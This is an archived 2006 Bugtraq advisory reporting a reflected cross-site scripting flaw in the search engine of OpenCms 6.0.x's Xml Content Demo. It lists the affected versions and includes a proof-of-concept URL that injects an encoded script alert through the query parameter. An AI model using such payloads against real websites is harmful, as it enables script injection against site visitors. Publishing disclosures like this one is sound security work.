lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 22 May 2006 14:32:41 -0000 From: jaime.blasco@...el.es To: bugtraq@...urityfocus.com Subject: OpenCms version 6.0.x Xml Content Demo search engine Cross site scripting Version: Tested on: - 6.0.0 - 6.0.2 - 6.0.3 Discovered by: jaime.blasco(at)eazel(dot).es http://www.eazel.es Description: Input passed to the search query in the Xml Content Demo search engine isn't properly sanitised. This can be exploited to conduct cross-site scripting attacks. Example: http://host/opencms/opencms/system/modules/org.opencms.frontend.templateone/pages/search.html?action=search&query=%22%3E%3Cscript%3Ealert%28'www.eazel.es'%29%3C%2Fscript%3E%3C!-&index=Online+project+%28VFS%29&page=1&uri=%2Fxmlcontentdemo%2Fside_element_demo.html&__locale=en&query2=%3Cscript%3Ealert%28a%29%3C%2Fscript%3E Original advisory: http://www.eazel.es/media/advisory002-OpenCms-Xml-Content-Demo-search-engine-Cross-site-scripting.html